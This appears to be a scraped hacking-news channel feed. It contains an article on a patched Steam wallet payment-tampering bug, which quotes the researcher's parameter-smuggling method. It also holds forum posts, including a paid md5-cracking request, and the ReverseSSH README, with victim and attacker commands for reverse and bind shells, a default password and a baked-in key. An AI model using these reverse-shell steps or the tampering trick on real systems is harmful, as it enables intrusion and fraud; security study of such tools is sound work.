Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Critical Valve Bug Lets Gamers Add Unlimited Funds to Steam Wallets

https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Critical Valve Bug Lets Gamers Add Unlimited Funds to Steam WalletsPost Views: 177
Reading Time: 1 Minute
Valve plugs an API bug found in its Steam platform that that abused the Smart2Pay system to add unlimited funds to gamer digital wallets.
A security researcher helped Valve, the makers of the gaming platform Steam, plug an easy-to-exploit hole that allowed users to add unlimited funds to their digital wallet. Simply by changing the account’s email address, the exploit allowed anyone to artificially boost their digital billfold to anything they wanted.

Steam Wallet funds are exclusive to the Steam platform and are used to purchase in-game merchandise, subscriptions and Steam-related content. Valve restricts Steam credits (or money) from being transferred outside its network for purchase or trading. However, there are several unsanctioned ways to convert wallet funds into actual dollars.

Working for the HackerOne bug-bounty program, security researcher DrBrix, reported the bug last Monday. By Wednesday, Valve plugged the hole and paid DrBrix $7,500 for identifying the bug.
See Also: Hacker claims to steal data of 100 million T-mobile customers The Hack: Turning $1 into $100 or $1MThe bug, which has since been patched, was exploited by abusing Valve’s own application programming interface (API) used to communicate with the third-party web payment firm Smart2Pay, owned by Nuvei.

According to DrBrix, the hack allowed an attacker to intercept the POST request sent from Valve to Smart2Pay. This was done via modifying the Steam user’s email address used by Smart2Pay as it passed through the Valve API.

“Firstly you will have to change yours steam account email to something like (I will explain why in next steps, amount100 is the important part): brixamount100abc@█████,” the researcher wrote.

This allows the attacker to manipulate communications between Valve and Smart2Pay, circumventing the cryptographic hash used to protect transaction data.

“We can’t change parameters as there is Hash field with signature, however signature is generated like that hash (ALL_FIELDS_NAMES_VALUES_CONTACTED),” DrBrix wrote. “So with our special email we can move parameters in a way that will change amount for us.”
See Also: Offensive Security Tool: Warcannon Where the Valve parameters might be,

“hash(MerchantID1102MerchantTransactionID█████Amount2000…..)” the attacker can turn $1 into $100 simply by changing the format of the email request.

“So with our special email we can move parameters in a way that will change amount for us. For example, we can change original Amount=2000 to Amount2=000 and after contacting it still will be Amount2000. Then we can change email from CustomerEmail=brixamount100abc%40████ to CustomerEmail=brix&amount=100&ab=c%40█████████ by this we are adding new field amount with our value,” DrBrix wrote. See Also: Hacking Stories: Andrian Lamo – The ‘homeless’ HackerValve first rated the bug as of moderate importance. However, after investigating, it escalated the bug to critical in nature, scoring it “9-10”, with the highest possible rating 10.

Valve did not return a Threatpost press request for comment.

“We have changed the severity assessment to Critical, reflecting the potential cost to the business, and applied a bounty accordingly,” wrote Valve in a HackerOne thread thanking DrBrix for the tip.
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/[...]
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Critical Valve Bug Lets Gamers Add Unlimited Funds to Steam Wallets https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Critical Valve Bug Lets Gamers Add Unlimited Funds to Steam…
wp-content/uploads/2021/08/tmobile-header-90x90.webp Hacker claims to steal data of 100 million T-mobile customers1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/depositphotos_40325161-stock-photo-microsoft-building-90x90.jpg Microsoft Warns: Another Unpatched PrintNightmare Zero-Day4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/crypto-hack-90x90.jpg Crypto Hack Earned Crooks $600 Million5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/msft-microsoft-logo-2-3-90x90.webp Actively Exploited Windows Zero-Day Gets a Patch6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/botnet-90x90.jpg Auth Bypass Bug Exploited, Affecting Millions of Routers1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/cisco-patch-90x90.png Critical Cisco Bug in VPN Routers Allows Remote Takeover1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/delete-telegram-message-e1628177080885-90x90.jpg MacOS Flaw in Telegram Retrieves Deleted Messages2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/spam-call-90x90.jpg Black Hat: ‘I’m Calling About Your Car Warranty’, aka PII Hijinx2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Google-Chrome-Browser-Management-90x90.png Bugs in Chrome’s JavaScript engine can lead to powerful exploits. This project aims to stop them2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/chinese-flag-keyboard-internet-istock-90x90.jpg DeadRinger: Chinese APTs strike major telecommunications companies2 weeks ago
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6620833063853657"
data-ad-slot="4517761481">
The post Critical Valve Bug Lets Gamers Add Unlimited Funds to Steam Wallets first appeared on Black Hat Ethical Hacking.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Recommended next book

I have finished reading https://nostarch.com/pentesting and am looking for the next best book for me to read about pentesting

submitted by /u/THESEASANIC
[link] [comments]
hacking: security in practice
md5 hash

Will pay $100 in btc if you can crack an md5 hash I have. DM me for the hash.

submitted by /u/kashnikov
[link] [comments]
hacking: security in practice
.NANO ransomware decryption

Does anyone know how to decrypt .NANO files and recover data? I have been trying now for about 2-3 years but still haven’t been able to find a software that works. 😕

submitted by /u/jasonslone
[link] [comments]
hacking: security in practice
what would you ask an appsec engineer?

asked this in other communities as well.

a friend of mine happens to be an app security engineer. i own a small YouTube channel and I invited them to have a chat about their work, the security industry and other professional jazz.

i wanted to see if there are any specific questions that the community might be appreciate knowing the answers to from someone who is a professional.

feel free to drop any questions. they don't need to be strictly technical/profession related but I would be inclining towards a more professional approach to this. however all questions are appreciated!

submitted by /u/OrganizationWinter99
[link] [comments]
ReverseSSH - Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such
http://www.kitploit.com/2021/08/reversessh-statically-linked-ssh-server.html
A statically-linked ssh server (https://www.kitploit.com/search/label/SSH%20server) with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar. Has been developed and was extensively used during OSCP exam preparation. Get the latest Release (https://github.com/Fahrj/reverse-ssh/releases/latest)
Features
Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history. Instead, you can go the way to simply deploy the lightweight ssh server (reverse-ssh onto the target, and use additional commodities such as file transfer and port forwarding! ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following: Fully interactive shell access (check windows caveats below) File transfer via sftp Local / remote / dynamic port forwarding Can be used as bind- and reverse-shell Supports Unix and Windows operating systems Windows caveats A fully interactive powershell (https://www.kitploit.com/search/label/PowerShell) on windows relies on Windows Pseudo Console ConPTY (https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/) and thus requires at least Win10 Build 17763. On earlier versions you can still get an interactive reverse shell that can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In such cases you have to append the cmd command, i.e. ssh cmd. You can achieve full interactive shell access for older windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows (https://github.com/PowerShell/Win32-OpenSSH/releases/latest) in the same directory as reverse-ssh and then use flag -s ssh-shellhost.exe. This will pipe all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes such that windows can understand.
Requirements
Simply executing the provided binaries only relies on golang system requirements (https://github.com/golang/go/wiki/MinimumRequirements#operating-systems). In short: Linux: kernel version 2.6.23 and higher Windows: Windows Server 2008R2 and higher or Windows 7 and higher Compiling additionally requires the following: golang version 1.15 optionally upx for compression (e.g. apt install upx-ucl)
Usage
Once reverse-ssh is running, you can connect with any username (https://www.kitploit.com/search/label/Username) and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server: # Simple command execution ssh -p whoami # Full-fledged file transfers sftp -P # Dynamic port forwarding as SOCKS proxy on port 9050 ssh -p -D 9050 "># Fully interactive shell access
ssh -p

# Simple command execution
ssh -p whoami

# Full-fledged file transfers
sftp -P

# Dynamic port forwarding as SOCKS proxy on port 9050
ssh -p -D 9050
Simple bind shell scenario
"># Victim
victim$./reverse-ssh

# Attacker (default password: letmeinbrudipls)
attacker$ssh -p 31337
Simple reverse shell scenario
# On victim victim$./reverse-ssh -p # or in case of an ssh daemon listening at port 22 with user/pass authentication victim$./reverse-ssh @ # On attacker (default password: letmeinbrudipls) attacker$ssh -p 8888 127.0.0.1 # or with ssh config from below attacker$ssh target "># On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
attacker$./reverse-ssh -l :

# On victim
victim$./reverse-ssh -p
# or in case of an ssh daemon listening at port 22 with user/pass authentication
victim$./reverse-ssh @
# On attacker (default password: letmeinbrudipls)
attacker$ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ssh target In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22. Just prepend @ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet... For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key (https://github.com/Fahrj/reverse-ssh/blob/master/id_reverse-ssh) to ~/.ssh/ and simply call ssh target or sftp target afterwards: Host target
Hostname 127.0.0.1
Port 8888
IdentityFile ~/.ssh/id_reverse-ssh
IdentitiesOnly yes
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
Full usage
Usage: reverse-ssh [options] [@] Examples: Bind: reverse-ssh reverse-ssh -v -l :4444 Reverse: reverse-ssh 192.168.0.1 reverse-ssh kali@192.168.0.1 reverse-ssh -p 31337 192.168.0.1 reverse-ssh -v -b 0 kali@192.168.0.2 Options: -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash) for windows this can only be used to give a path to 'ssh-shellhost.exe' to enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory) -l, Bind scenario only: listen at this address:port (default: :31337) -p, Reverse scenario only: ssh port at home (default: 22) -b, Reverse scenario only: bind to this port after dialling home (default: 8888) -v, Emit log output Optional target which enables the reverse scenario. Can be prepended with @ to authenticate as a different user than 'reverse' while dialling home. Credentials: Accepting all incoming connections from any user with either of the following: * Password "letmeinbrudipls" * PubKey "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi" ">reverseSSH v1.1.0 Copyright (C) 2021 Ferdinor

Usage: reverse-ssh [options] [@]

Examples:
Bind:
reverse-ssh
reverse-ssh -v -l :4444
Reverse:
reverse-ssh 192.168.0.1
reverse-ssh kali@192.168.0.1
reverse-ssh -p 31337 192.168.0.1
reverse-ssh -v -b 0 kali@192.168.0.2

Options:
-s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)
for windows this can only be used to give a path to 'ssh-shellhost.exe' to
enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
-l, Bind scenario only: listen at this address:port (default: :31337)
-p, Reverse scenario only: ssh port at home (default: 22)
-b, Reverse scenario only: bind to this port after dialling home (default: 8888)
- v, Emit log output


Optional target which enables the reverse scenario. Can be prepended with
@ to authenticate as a different user than 'reverse' while dialling home.

Credentials:
Accepting all incoming connections from any user with either of the following:
* Password "letmeinbrudipls"
* PubKey "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"
Build instructions
Make sure to install the above requirements (https://www.kitploit.com/search/label/Requirements) such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size. make

# or to additionally created binaries packed with upx
make compressed You can also specify a different default shell (RS_SHELL), a personalized password (RS_PASS) or an authorized key (RS_PUB) when compiling: ssh-keygen -t ed25519 -f id_reverse-ssh

RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed
Building for different operating systems or architectures
By default, reverse-ssh is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64. To compile for other architectures or another OS you can provide environmental variables which match your target, e.g. for linux/arm64: GOARCH=arm64 GOOS=linux make compressed A list of available targets in format OS/arch can be obtained via go tool dist list.
Contribute
Is a mind-blowing feature missing? Anything not working as intended? Create an issue or pull request!

Download Reverse-Ssh (https://github.com/Fahrj/reverse-ssh)
How I Scored 1K Bounty Using Waybackurls

Approaching a target from all anglesContinue reading on InfoSec Write-ups »
Read more...
Metacommunication and Bug Bounty Programs

What metacommunication do bug bounty teams and researchers need to be aware of? The most important are context and relationships.Continue reading on Discernible »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
AlanFramework : A Post-Exploitation Framework

AlanFramework is a post-exploitation framework useful during red-team activities. Changelog 3.0.0 – 15/05/2021 Renamed agent shell quit command to exit Implemented agent migration via migrate command Fixed error in retrieving OS version Added DLL as agent format in the creation wizard. Implemented ps command to list the currently running processes Implemented download command to locally download a file or an entire directory Implemented upload command to […]

The post AlanFramework : A Post-Exploitation Framework appeared first on Kali Linux Tutorials.